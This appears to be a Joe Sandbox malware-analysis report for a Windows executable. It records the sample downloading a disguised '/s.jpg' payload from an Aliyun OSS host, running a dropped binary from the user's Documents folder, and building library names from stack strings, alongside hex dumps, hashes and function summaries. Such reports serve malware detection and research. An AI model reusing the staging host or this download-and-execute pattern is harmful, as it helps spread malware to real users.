2025-03-23 02:16:08 UTC	160	IN	Data Raw: bc 56 8d a1 48 a7 d8 db 20 3c c6 64 eb a7 f5 dc 87 01 85 4d b3 73 df 7e 2f 72 c3 fe 90 7f 53 03 95 c3 69 b4 78 70 7f 47 cd 54 d7 16 ca e8 7a 26 d7 20 64 6e df e5 43 1a 7a 90 7c ad 5f 36 aa 81 b5 fe 6e b2 cd cf ba 1d 41 b4 54 53 e9 3f 79 f1 5e 23 29 65 39 09 a1 03 8d 0a fe 23 25 a7 5c cd 0e 5d 86 0a 45 0c 38 50 e4 30 db dd d2 af bb de fa 16 60 6f 98 ea 3b 50 91 e8 7f a4 41 45 cc 50 fe 5e b5 e2 5c 31 55 2a 67 69 1d 23 55 9c 19 fe aa 01 a8 35 68 df e2 53 d9 70 80 53 71 41 d6 45 Data Ascii: VH <dMs~/rSixpGTz& dnCz\|_6nATS?y^#)e9#%\]E8P0`o;PAEP^\1U*gi#U5hSpSqAE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49738	39.103.20.80	443	8564	C:\Users\user\Desktop\KHoDN.76532.10.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-23 02:16:09 UTC	106	OUT	GET /s.jpg HTTP/1.1 User-Agent: 3M Host: f3rf3r.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-03-23 02:16:10 UTC	547	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Sun, 23 Mar 2025 02:16:10 GMT Content-Type: image/jpeg Content-Length: 102636 Connection: close x-oss-request-id: 67DF6EEA5423BA3234FD24EF Accept-Ranges: bytes ETag: "CEE07CC9376774EB4A5F09A96A71AD17" Last-Modified: Sun, 23 Mar 2025 01:37:43 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 12557728182947735992 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: zuB8yTdndOtKXwmpanGtFw== x-oss-server-time: 8
2025-03-23 02:16:10 UTC	3549	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ed 9d 7d 9c 55 55 d5 c7 fb f8 b9 20 e1 cb 83 84 88 22 12 11 2a 21 12 92 11 0f 91 0f 92 21 59 46 44 a4 48 48 68 44 a4 46 a6 44 44 26 22 12 11 12 11 11 11 22 1a a9 91 c2 c0 30 0c c3 f0 3e 0c c3 30 0c 30 c0 00 73 e7 9e b9 f3 fe 7e 67 e6 ce 3b ff cc 73 7f bc 18 d1 30 dc b3 e7 9c f3 3b f7 ee f5 c7 f7 23 f2 72 67 dd bd f7 5a 67 9f bd d6 fe ad 4f b4 b4 b4 7c 42 10 04 3d a1 1b 20 08 02 0f ba 01 82 20 f0 a0 1b 20 08 02 0f ba 01 82 20 f0 a0 1b 20 08 02 0f ba 01 82 20 f0 a0 1b 20 08 02 0f ba 01 82 20 f0 a0 1b 20 08 02 0f ba 01 82 20 f0 a0 1b 20 08 02 0f ba 01 82 20 f0 a0 1b 20 Data Ascii: PNGIHDR\rfpHYs IDATx}UU "*!!YFDHHhDFDD&""0>00s~g;s0;#rgZgO\|B=
2025-03-23 02:16:10 UTC	4096	IN	Data Raw: 6b 2d 9d 84 8a 40 2c 74 9c 36 fb ea ce 5d c7 76 3c b7 01 0d 7e 1c c4 b5 27 10 20 1b 61 f6 e7 e2 c0 50 d2 7f 1c 90 39 b2 6b 3d d1 16 f2 df fe 33 fd 67 e0 70 09 1a e7 56 17 3a 44 2b 7b cb 1b 7a 3f 79 a8 68 d1 4d 0a 19 04 95 d6 df 7f 96 f4 1f 8d 9f 67 94 59 22 fe d1 1a b4 05 fc ad e4 c2 e5 70 7c 68 ca ff c1 5b 35 8e ed 50 91 0a 32 1f 97 c6 32 9c c5 84 43 57 14 f3 98 fd 39 72 5b 93 83 95 e2 1f ad 41 5b b8 90 ff 06 6c 07 8a 16 36 14 d4 3e 88 d4 de b5 02 81 6a fa 0f e9 56 b6 33 e8 88 95 e2 1f ad 41 5f b8 82 b5 fc 31 bb 6a ec 5d 71 46 d2 d5 16 14 4a 95 cd 7e 26 32 2f 22 d6 ca e1 fb 87 8b 17 d8 b9 5e e8 0b 56 b0 9e b3 b5 cd 1d 7f 90 56 32 af f3 15 07 85 48 ff a1 f1 aa d9 cf 83 00 25 db 11 74 05 a5 f2 76 ae 15 fa 62 65 02 5d 3b e4 da 77 95 d5 f7 c5 1d 01 a4 da d0 Data Ascii: k-@,t6]v<~' aP9k=3gpV:D+{z?yhMgY"p\|h[5P22CW9r[A[l6>jV3A_1j]qFJ~&2/"^VV2H%tvbe];w
2025-03-23 02:16:10 UTC	4096	IN	Data Raw: 37 7e 75 b2 62 1a 7b fd 58 0d dd 00 5d f9 f1 d1 d2 d9 e8 ba ac f2 6f dd a2 d7 a0 19 46 7c 49 7d 7f f6 ba b1 1a ba 01 82 79 a0 6b e0 02 87 d0 0a 94 7f b3 e7 dd 0e e8 06 08 e6 40 66 c1 2e bd 06 e1 ea 44 b2 f6 7f 5b d0 0d 10 cc f1 57 a3 7a 34 db 19 74 03 d2 72 7f 53 94 6a 77 3b 74 03 04 73 48 ef 3f e7 b9 2d d6 97 a6 a2 d5 10 09 d0 0d 10 cc d1 7b 9b 91 c4 76 08 dd 50 ed d4 1c 09 d0 0d 10 c2 07 0d 43 45 ae dd 79 22 5d fb bf 2d e8 06 08 e1 83 3c 34 db 19 74 03 01 57 55 ab 21 12 a0 1b 20 84 cf 17 2e 14 10 d1 9d 42 27 06 25 fa 63 d9 f3 6e 27 74 03 84 f0 41 f1 90 47 f4 ff 1d 05 22 b9 ec 79 b7 13 ba 01 82 39 70 cd 18 9a 74 6c c7 d0 01 a4 ff a0 ef c0 9e 73 3b a1 1b 20 98 67 7f 45 43 af 07 cc 89 8e 08 0a 20 fd 87 46 39 ec f9 b6 13 ba 01 82 3a 3f 3d 5e f6 a2 5c 0a b2 Data Ascii: 7~ub{X]oF\|I}yk@f.D[Wz4trSjw;tsH?-{vPCEy"]-<4tWU! .B'%cn'tAG"y9ptls; gEC F9:?=^\
2025-03-23 02:16:10 UTC	4096	IN	Data Raw: 40 03 fe 14 0b 48 4d e4 a5 8f 8f 14 95 d2 67 5b fd b5 17 53 71 f2 f1 19 9d 1e 16 60 23 02 76 56 6f 19 05 7d 62 ea 2b c4 bf 8c 4b 45 99 1b db 71 f6 33 17 d8 3a 10 d8 3f b7 25 de 43 6f a2 40 83 40 e2 c7 42 48 eb 79 0c 7f b1 c5 9b b9 f8 52 94 63 16 d3 a7 2c 65 b3 ac dc 9f 19 eb b9 2a e0 5c 65 c6 5f 78 e2 a2 83 9b af 7a 1b 68 3d 5a f8 b2 cf 77 71 31 99 35 f0 7f 7d 32 f4 8d 27 bc 82 84 c4 86 78 59 76 8f 4e 9a 8f 8e 86 f2 b5 79 91 f4 d7 1d cb bc a9 9e d3 17 7d a0 d7 2b dd 86 eb e5 15 b6 87 e9 f7 69 12 bd fe 46 95 14 01 b7 23 a4 ac c4 a6 49 86 8a fb 9c 37 47 34 c5 44 32 c0 41 05 d2 b8 c5 0a c9 8b ec ce fe 90 13 f1 2d 1b 5d d0 ba 57 d9 31 99 58 bc d3 4c ce c0 62 df 11 ff a5 ed 77 9d da 02 bc 7c e0 06 15 d0 da f2 1b 21 fc f6 f7 7b dc 20 ee 8c fc fe 9f 0c e2 62 05 Data Ascii: @HMg[Sq`#vVo}b+KEq3:?%Co@@BHyRc,e*\e_xzh=Zwq15}2'xYvNy}+iF#I7G4D2A-]W1XLbw\|!{ b
2025-03-23 02:16:10 UTC	4096	IN	Data Raw: e7 b2 b7 1e 38 7b 0f 87 00 b0 be 13 81 04 1f fc f7 fa a7 1c 9a 17 b6 ec 1d ae 1d a4 18 cb d0 3c 16 fd a7 2d 9c 5a 2f 0c 81 0e 92 72 aa 02 33 fe 8f 96 38 68 05 a6 1a 5f 3b 2f c0 45 ff a2 42 bb 86 af d7 e9 3b 99 d9 4a 47 db 49 52 48 26 4e f0 48 ce 07 5a b2 47 fb 47 3a bf 5d e2 aa a6 67 ac 9a 73 f8 40 09 6d 47 61 14 3e 6e 90 36 ad 25 ce 3d fd 77 bc 35 f3 33 5c 31 f7 3f 25 01 fb d3 84 ea ce 8f 19 8d fa 2b b8 c5 0d ef 58 31 b9 db 74 25 97 7f 9c 71 96 1a 34 10 ca bb f8 2a f8 a8 67 98 59 67 bb a9 04 eb ad 83 45 94 80 dd 20 c6 c4 06 97 4b cb 2b b3 c2 b0 bd 35 4d 88 4a 2b 46 3b b1 c6 ec 45 96 35 40 37 25 74 9d 2d c0 d7 c7 4f 35 d2 b7 f8 d3 4a cb 94 be 9b cf 00 df d9 93 e0 65 98 e2 d3 99 e2 95 ea 9d e4 91 25 b0 89 21 ed f5 82 12 83 d8 e0 4d b8 27 56 b7 8b d0 33 1e Data Ascii: 8{<-Z/r38h_;/EB;JGIRH&NHZGG:]gs@mGa>n6%=w53\1?%+X1t%q4*gYgE K+5MJ+F;E5@7%t-O5Je%!M'V3
2025-03-23 02:16:10 UTC	4096	IN	Data Raw: 81 22 07 88 09 0a 0b 48 84 62 2b 12 51 13 31 2c 5d 95 73 3c 29 1a 1b 54 94 42 3b 08 69 ab 23 58 01 06 cf 19 d1 d5 d4 2d 28 75 6e cf f7 7e b8 b8 11 b4 37 38 33 7e 00 88 19 8e 3f 79 51 4d c1 a4 bb 46 ca c3 d5 6e 09 54 4d 5b 07 d1 95 92 53 40 14 56 08 19 07 1b 06 1d 01 01 5f 3e 3c a1 8b 84 24 66 67 6a a5 6a 6b 24 e6 aa 27 f9 29 72 7b 3c fc 1e 67 30 f0 0a 7b 64 35 f7 07 a0 c0 d4 cb 84 06 6a a7 bb 52 c7 00 7c 8d c6 04 7a d9 19 6a ad cc 86 93 97 1d 6a 9b dd d5 fd ee b0 a5 4a 85 54 a4 9b 6f e4 aa ba 65 a3 29 75 af ba 34 44 c7 34 ba fe d4 cf bd 52 b6 bc b1 be f7 4d cd c4 28 c1 8d 4d c7 03 42 39 f3 95 dd c1 4b d2 6b d2 c3 22 d2 56 a3 d2 2f 9a 9e dc cd d1 5a 4b 62 f5 f2 ec 0d 07 08 e9 a6 1a a3 8f aa 6f 6f 67 01 19 f0 bc 7e 05 73 f1 e9 32 b3 9f b8 7e f6 c8 49 39 43 Data Ascii: "Hb+Q1,]s<)TB;i#X-(un~783~?yQMFnTM[S@V_><$fgjjk$')r{<g0{d5jR\|zjjJToe)u4D4RM(MB9Kk"V/ZKboog~s2~I9C
2025-03-23 02:16:10 UTC	4096	IN	Data Raw: bc 07 e5 0b cf 29 e5 4d cb 4b 3f 50 10 53 d4 51 39 34 17 1a 9c 1a d3 69 1b 5f 9c ee de c9 23 14 6d ad 70 20 ac c7 5f 38 3d 66 af 55 37 d2 58 7c bc 3c 17 79 b2 fa d0 16 d7 3f fe ab 83 58 42 4f 46 07 b0 96 a8 4f 21 4f 0d 88 07 db cd 76 a3 15 4f d7 53 9c f9 5b 4f 03 1c 00 1e 3d 61 23 3f 3b 3b 3b a4 a4 a5 ea a7 24 e6 aa 27 f9 29 32 51 74 1d 66 3f f1 09 62 33 f5 7d 06 5f c1 d7 ca 00 68 b5 86 c3 03 c8 be cb 06 67 c6 9f 1b 48 d3 2d 16 e3 15 6f 9d 91 95 14 55 bd 9f eb 8d e4 27 b3 64 aa 22 b2 88 be eb 28 44 bd af a0 34 3a 70 b0 5c b4 c2 3d e5 5a bb 40 7f b8 bf b0 45 20 5c c3 4f 94 ee 8e 43 37 82 40 cc 84 d6 44 12 10 3a d7 7c c5 d7 9f 55 98 3a d6 9f c5 96 db 6b d0 c6 e1 90 eb ae 62 1e e9 93 e2 a4 1a 30 6c 3a b1 f2 7a a7 dd 75 8c c8 f9 f5 d9 71 7c cf 38 43 31 03 27 Data Ascii: )MK?PSQ94i_#mp _8=fU7X\|<y?XBOFO!OvOS[O=a#?;;;$')2Qtf?b3}_hgH-oU'd"(D4:p\=Z@E \OC7@D:\|U:kb0l:zuq\|8C1'
2025-03-23 02:16:10 UTC	4096	IN	Data Raw: a7 28 8e 5b 19 24 50 24 1f be 3f 1e 7a 22 a2 3a 49 49 49 3a da 6f 3d 68 39 06 6d 0e e7 63 ae b5 b8 ff c5 06 9d 04 24 9b 1f bf 02 73 20 1c e2 19 d6 d6 c8 c7 39 18 70 34 7d b6 4b 61 56 31 4b cc 01 56 63 79 71 0c 29 0a 83 a6 0e 85 d3 ec 15 94 56 2d f7 20 d6 e8 7a cc 0d 3c 6f e0 de 2e e8 aa b4 23 17 4a a6 66 83 8a cd 0c 9f 5b 6a b4 30 4c 3d 77 9c 6d b0 78 fe b5 7c 7c 19 ac 08 b3 87 85 44 b7 f3 c8 b2 0f 42 44 4a cd c7 a3 10 d6 5c c5 85 a4 44 17 7a a8 29 a6 49 4f f2 9a 49 0d 8d 05 a3 6c d2 58 ad e9 7d 36 9e 67 a0 12 67 28 b7 6e a2 67 2d 53 f7 31 f0 88 bc 1e c6 bf e1 b6 f4 41 0c b2 e1 83 38 b0 ba 4d b8 d1 6f cc f1 b4 d3 5d d2 3d f0 52 9a fa 53 dc da 35 ff 63 08 e4 97 f0 d0 07 e6 e7 08 96 e1 7d ed 6e 6e f1 84 3a 7d bc 96 d6 92 71 fe cb f5 df c3 10 bf 83 d5 82 67 Data Ascii: ([$P$?z":III:o=h9mc$s 9p4}KaV1KVcyq)V- z<o.#Jf[j0L=wmx\|\|DBDJ\Dz)IOIlX}6gg(ng-S1A8Mo]=RS5c}nn:}qg
2025-03-23 02:16:10 UTC	4096	IN	Data Raw: c5 1d 73 1a 40 b0 7b 44 0d d4 59 86 2f e3 96 eb 00 16 59 cc 19 1a f0 1c f5 7d 56 20 a8 b2 ef e0 74 15 fc e8 ab 5e 2b 20 65 ab fd 44 36 7f b6 34 f5 43 2c b0 20 d2 11 3a 2d 3e 3f fb 57 c3 d1 5c ad a4 77 4c 49 4a c0 8c 58 0f 01 1c da 52 9a 18 7e 97 14 d2 5d 52 5b 1d d5 5f 16 9f a0 e6 a3 64 11 82 2f eb 83 6b 1e 80 c4 ee 60 05 a8 32 7d 84 f5 02 cc f8 5a 12 7b 97 b9 bd 59 5f 41 ab 42 a5 8f 94 3e 49 9a 62 ab 0c f7 78 8a 25 91 33 92 94 97 e2 bd 21 8e 1b 1b 98 62 8b 17 71 a1 a2 e3 ac a1 a1 1e 68 fa aa 66 85 ec 16 ae 70 8e b2 09 a1 b5 b6 f7 f9 99 37 f3 be 55 2b 3f c3 78 c1 da c5 ca 51 32 88 b6 db cb aa ab c1 83 cf 55 92 db 54 cf fd 06 d8 e8 ae d3 b6 2a 1f de f3 95 ff ec 52 e5 e7 dd ec e3 9f b6 a4 12 ae 2e b9 0e 3a 87 a6 b5 da b9 7a b1 f9 fc 89 1e b7 44 80 05 02 13 Data Ascii: s@{DY/Y}V t^+ eD64C, :->?W\wLIJXR~]R[_d/k`2}Z{Y_AB>Ibx%3!bqhfp7U+?xQ2UT*R.:zD
2025-03-23 02:16:10 UTC	4096	IN	Data Raw: 70 0a 61 8b f2 02 2b 03 9e ce e6 b3 90 6d 4c 4d 54 97 37 6d 6b 56 90 1b 1d 1b 56 20 aa e2 6b 07 e0 6f 04 ec 29 62 f8 c4 4b ad d7 38 47 3a 34 8e 34 96 33 d3 76 49 3e 1c 7c b4 e8 ab 09 e0 42 cf 87 46 0f 9b a9 02 60 8e 04 6d 4f 90 18 d7 97 21 66 17 d4 58 a7 6a 2f 45 14 9f b7 64 ed 2a db 47 75 a6 44 4b ac 26 ab 6f 2d bd 87 9b 60 3a cb f5 c7 76 77 78 89 05 37 f9 bd 3f 70 80 14 42 c2 a6 55 0c 45 63 c9 a2 b6 8c 8f 8e 8f 30 80 17 93 4f e1 35 db a1 a6 e6 05 2c 76 0d a2 a0 41 a9 e0 a6 35 e6 a5 48 d4 21 40 2c 9f ae e3 50 fd 1a ff d1 b5 95 ef fd f4 fb e7 5d 9f dd c7 b4 c5 e6 d3 e6 89 8b 4c 10 85 41 49 1e cd d1 87 55 03 a7 e0 f5 19 77 f6 9c 54 80 cd 94 fd 9c f7 84 2b ab ed 79 ca 09 c6 24 00 85 8b fe a0 de 6a 2b 84 e9 12 a0 14 f0 4c ee ea 9b cc 9d c8 38 bf 20 06 5a 2f Data Ascii: pa+mLMT7mkVV ko)bK8G:443vI>\|BF`mO!fXj/Ed*GuDK&o-`:vwx7?pBUEc0O5,vA5H!@,P]LAIUwT+y$j+L8 Z/

Statistics

Click to jump to process

Memory Usage

• KHoDN.76532.10.exe
• vIPphI.exe

Click to jump to process

High Level Behavior Distribution

• File
• Registry

Click to dive into process behavior distribution

Behavior

• KHoDN.76532.10.exe
• vIPphI.exe

Click to jump to process

Target ID:	0
Start time:	22:14:19
Start date:	22/03/2025
Path:	C:\Users\user\Desktop\KHoDN.76532.10.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\KHoDN.76532.10.exe"
Imagebase:	0x140000000
File size:	54'836'251 bytes
MD5 hash:	96599C5A60E5589F37EC8E25F05F43C3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	22:16:10
Start date:	22/03/2025
Path:	C:\Users\user\Documents\vIPphI.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Documents\vIPphI.exe
Imagebase:	0x7ff79ee60000
File size:	138'776 bytes
MD5 hash:	DF76205EAF175184567FC44A83019B20
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage

Dynamic/Packed Code Coverage

Signature Coverage

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6.8%
Total number of Nodes:	720
Total number of Limit Nodes:	5

Executed Functions

Function 00007FF79EE63CA9 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 347
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 00007FF79EE63FB6
@, xrefs: 00007FF79EE63D80

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 0dd360fd04809f972682b0a52577e24ce017f8b1cd9c751401ac34e51fc80e73
Instruction ID: d9812e7d8dd3f5acf31b627177a97de661d4814a1de06e89595979b5094aa59f
Opcode Fuzzy Hash: 0dd360fd04809f972682b0a52577e24ce017f8b1cd9c751401ac34e51fc80e73
Instruction Fuzzy Hash: 8212D932619B8486DBA0DB19E4C076EF7A0F7C8B54F505126EA8E87B68DF7CD454CB10

Function 00007FF79EE64330 Relevance: 1.6, APIs: 1, Instructions: 125
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL ref: 00007FF79EE643F6

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 98438039e33463d4e652b996c8292c94279decd7456648971fd38e929aab13de
Instruction ID: 34591489ba5efded619c4aff0477d7ec9ba8189c43ef6d958c8254708da2bf40
Opcode Fuzzy Hash: 98438039e33463d4e652b996c8292c94279decd7456648971fd38e929aab13de
Instruction Fuzzy Hash: B361C636619FC582DBB0DB19E4907AEA361FBC8B44F504026DA8E87B68DF3DD455CB10

Function 00007FF79EE62FC0 Relevance: 124.4, APIs: 1, Strings: 70, Instructions: 136
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE ref: 00007FF79EE63001

Strings

s, xrefs: 00007FF79EE631E4
c, xrefs: 00007FF79EE6318C
y, xrefs: 00007FF79EE632AC
i, xrefs: 00007FF79EE63254
l, xrefs: 00007FF79EE63214
., xrefs: 00007FF79EE6312B
o, xrefs: 00007FF79EE632DC
e, xrefs: 00007FF79EE6328C
L, xrefs: 00007FF79EE63144
R, xrefs: 00007FF79EE63314
l, xrefs: 00007FF79EE63135
t, xrefs: 00007FF79EE6331C
t, xrefs: 00007FF79EE63117
o, xrefs: 00007FF79EE6329C
V, xrefs: 00007FF79EE6324C
l, xrefs: 00007FF79EE63126
t, xrefs: 00007FF79EE6323C
d, xrefs: 00007FF79EE6319C
N, xrefs: 00007FF79EE631FC
a, xrefs: 00007FF79EE63234
L, xrefs: 00007FF79EE632D4
s, xrefs: 00007FF79EE631EC
d, xrefs: 00007FF79EE63130
L, xrefs: 00007FF79EE632BC
r, xrefs: 00007FF79EE6317C
a, xrefs: 00007FF79EE632E4
d, xrefs: 00007FF79EE632EC
D, xrefs: 00007FF79EE632F4
l, xrefs: 00007FF79EE6327C
t, xrefs: 00007FF79EE63264
n, xrefs: 00007FF79EE63112
t, xrefs: 00007FF79EE6316C
l, xrefs: 00007FF79EE6313A
l, xrefs: 00007FF79EE6321C
l, xrefs: 00007FF79EE63121
m, xrefs: 00007FF79EE63294
G, xrefs: 00007FF79EE6315C
d, xrefs: 00007FF79EE631CC
r, xrefs: 00007FF79EE6325C
P, xrefs: 00007FF79EE63174
r, xrefs: 00007FF79EE631D4
l, xrefs: 00007FF79EE632FC
M, xrefs: 00007FF79EE63284
e, xrefs: 00007FF79EE63164
d, xrefs: 00007FF79EE631C4
r, xrefs: 00007FF79EE63154
r, xrefs: 00007FF79EE632A4
n, xrefs: 00007FF79EE63334
u, xrefs: 00007FF79EE6326C
e, xrefs: 00007FF79EE63244
d, xrefs: 00007FF79EE6311C
e, xrefs: 00007FF79EE63194
o, xrefs: 00007FF79EE63224
e, xrefs: 00007FF79EE631B4
u, xrefs: 00007FF79EE631A4
i, xrefs: 00007FF79EE6333C
r, xrefs: 00007FF79EE631AC
d, xrefs: 00007FF79EE632C4
e, xrefs: 00007FF79EE631DC
A, xrefs: 00007FF79EE631BC
r, xrefs: 00007FF79EE632CC
d, xrefs: 00007FF79EE6314C
a, xrefs: 00007FF79EE63274
A, xrefs: 00007FF79EE6320C
l, xrefs: 00007FF79EE63304
t, xrefs: 00007FF79EE63204
c, xrefs: 00007FF79EE6322C
o, xrefs: 00007FF79EE63184
l, xrefs: 00007FF79EE63324
I, xrefs: 00007FF79EE6332C

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: FileRead
String ID: .$A$A$D$G$I$L$L$L$M$N$P$R$V$a$a$a$c$c$d$d$d$d$d$d$d$d$e$e$e$e$e$e$i$i$l$l$l$l$l$l$l$l$l$l$m$n$n$o$o$o$o$r$r$r$r$r$r$r$s$s$t$t$t$t$t$t$u$u$y
API String ID: 2738559852-1965609705
Opcode ID: 79c85e39f9cbffc2efb37411a4b056f2aac5e19369ed82b95aa51f7d4d3f4e01
Instruction ID: 57c02c722ca5cbf816d7ca36398b087c5046b7d3539a2e8f5b2fefef8a996483
Opcode Fuzzy Hash: 79c85e39f9cbffc2efb37411a4b056f2aac5e19369ed82b95aa51f7d4d3f4e01
Instruction Fuzzy Hash: 2F91AA2250D7C0C9E332C728E45879FBF91E396748F084199C7C94BA9AC6BEC558CB36

Function 00007FF79EE62F58 Relevance: 31.6, APIs: 2, Strings: 16, Instructions: 85
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 00007FF79EE62FBE
ReadFile.KERNELBASE ref: 00007FF79EE63001

Strings

c, xrefs: 00007FF79EE62F95
r, xrefs: 00007FF79EE62F59
a, xrefs: 00007FF79EE62F81
., xrefs: 00007FF79EE62F63
o, xrefs: 00007FF79EE62F90
d, xrefs: 00007FF79EE62F67
m, xrefs: 00007FF79EE62F7C
c, xrefs: 00007FF79EE62F54
l, xrefs: 00007FF79EE62F72
l, xrefs: 00007FF79EE62F6D
d, xrefs: 00007FF79EE62F68
l, xrefs: 00007FF79EE62F8B
v, xrefs: 00007FF79EE62F4F
l, xrefs: 00007FF79EE62F86
s, xrefs: 00007FF79EE62F4A
t, xrefs: 00007FF79EE62F5E

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: FileReadmalloc
String ID: .$a$c$c$d$d$l$l$l$l$m$o$r$s$t$v
API String ID: 856370052-1628026266
Opcode ID: 2ec9f53486f167685c9b30720e582e176ab5607d743db366a11b7598a7e201d0
Instruction ID: 214af8bd4ee28b475b9980686d9421c48efe3b8a90aba9d1a5271e653b8bf39a
Opcode Fuzzy Hash: 2ec9f53486f167685c9b30720e582e176ab5607d743db366a11b7598a7e201d0
Instruction Fuzzy Hash: 7041063351C7C08AE7628B68E0583DABBA1E3D5B14F140169E7C847B5ACBBDC149CF21

Function 00007FF79EE62F34 Relevance: 31.6, APIs: 2, Strings: 16, Instructions: 51
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 00007FF79EE62FBE
ReadFile.KERNELBASE ref: 00007FF79EE63001

Strings

c, xrefs: 00007FF79EE62F95
r, xrefs: 00007FF79EE62F59
a, xrefs: 00007FF79EE62F81
m, xrefs: 00007FF79EE62F45
., xrefs: 00007FF79EE62F63
o, xrefs: 00007FF79EE62F90
m, xrefs: 00007FF79EE62F7C
c, xrefs: 00007FF79EE62F54
l, xrefs: 00007FF79EE62F72
l, xrefs: 00007FF79EE62F6D
d, xrefs: 00007FF79EE62F68
l, xrefs: 00007FF79EE62F8B
v, xrefs: 00007FF79EE62F4F
l, xrefs: 00007FF79EE62F86
s, xrefs: 00007FF79EE62F4A
t, xrefs: 00007FF79EE62F5E

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: FileReadmalloc
String ID: .$a$c$c$d$l$l$l$l$m$m$o$r$s$t$v
API String ID: 856370052-2574083433
Opcode ID: f9308e4bc041fe600d3565d07728ba101a74700d451691f9dfdcf0e57c666784
Instruction ID: f277b38bd3adc9a2252b57934a4b409fb2463e6bcda798a61a02341d84029a16
Opcode Fuzzy Hash: f9308e4bc041fe600d3565d07728ba101a74700d451691f9dfdcf0e57c666784
Instruction Fuzzy Hash: BE31953250D7C0C9E7628B68E45839AFBE1E395B44F140059A7C846B5ACBBEC158CF21

Function 00007FF79EE62E9C Relevance: 17.5, APIs: 1, Strings: 9, Instructions: 28
fileCOMMON

Download Yara Rule

